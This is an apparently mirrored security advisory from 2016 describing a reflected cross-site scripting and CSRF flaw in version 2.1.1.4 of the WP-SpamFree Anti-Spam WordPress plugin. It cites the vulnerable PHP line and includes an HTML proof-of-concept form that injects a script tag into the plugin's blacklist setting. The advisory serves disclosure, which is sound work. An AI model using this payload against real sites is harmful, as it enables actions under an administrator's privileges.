Lucene search

K
packetstormSecurify B.V.PACKETSTORM:141386
HistoryMar 01, 2017 - 12:00 a.m.

WordPress WP-SpamFree Anti-Spam 2.1.1.4 Cross Site Scripting

2017-03-0100:00:00
Securify B.V.
packetstormsecurity.com
19
`------------------------------------------------------------------------  
Cross-Site Scripting vulnerability in WP-SpamFree Anti-Spam WordPress  
Plugin  
------------------------------------------------------------------------  
Radjnies Bhansingh, July 2016  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A reflected Cross-Site Scripting vulnerability exists in the WP-SpamFree  
Anti-Spam WordPress plugin. This vulnerability allows an attacker to  
perform any action with the privileges of the target user. The affected  
code is not protected with an anti-Cross-Site Request Forgery token.  
Consequently, it can be exploited by luring the target user into  
clicking a specially crafted link or visiting a malicious website (or  
advertisement).  
  
------------------------------------------------------------------------  
OVE ID  
------------------------------------------------------------------------  
OVE-20160712-0026  
  
------------------------------------------------------------------------  
Tested versions  
------------------------------------------------------------------------  
This issue was succesfully tested on the WP-SpamFree Anti-Spam WordPress  
Plugin version 2.1.1.4.  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
There is currently no fix available.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_wp_spamfree_anti_spam_wordpress_plugin.html  
  
The vulnerability exists in the wp-spamfree.php file on line 6049:  
  
$blacklist_keys_update = trim(stripslashes($_REQUEST['wordpress_comment_blacklist']));  
  
In order to exploit this issue the target user must click a specially crafted link or visit a malicious website (or advertisement) and must be autenticated within WordPress.  
  
In addition the WordPress specific blacklist can be cleared by using the request below and employing CSRF.   
  
Proof of concept  
  
The following proof of concept code demonstrates this issue:  
  
<html>  
<body>  
<form action="http://<target>/wp-admin/options-general.php?page=wp-spamfree%2Fwp-spamfree.php" method="POST">  
<input type="hidden" name="submitted_wpsf_general_options" value="1"/>  
<input type="hidden" name="use_alt_cookie_method" value="on"/>  
<input type="hidden" name="comment_logging_all" value="on"/>  
<input type="hidden" name="enhanced_comment_blacklist" value="on"/>  
<input type="hidden" name="wordpress_comment_blacklist" value="</textarea><script>alert(1)</script>foo   
bar   
press   
"/>  
<input type="hidden" name="allow_proxy_users" value="on"/>  
<input type="hidden" name="promote_plugin_link" value="on"/>  
<input type="hidden" name="submit_wpsf_general_options" value="Update Options i?1/2%B"/>  
<input type="submit"/>  
</form>  
</body>  
</html>  
  
------------------------------------------------------------------------  
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its  
goal is to contribute to the security of popular, widely used OSS  
projects in a fun and educational way.  
  
`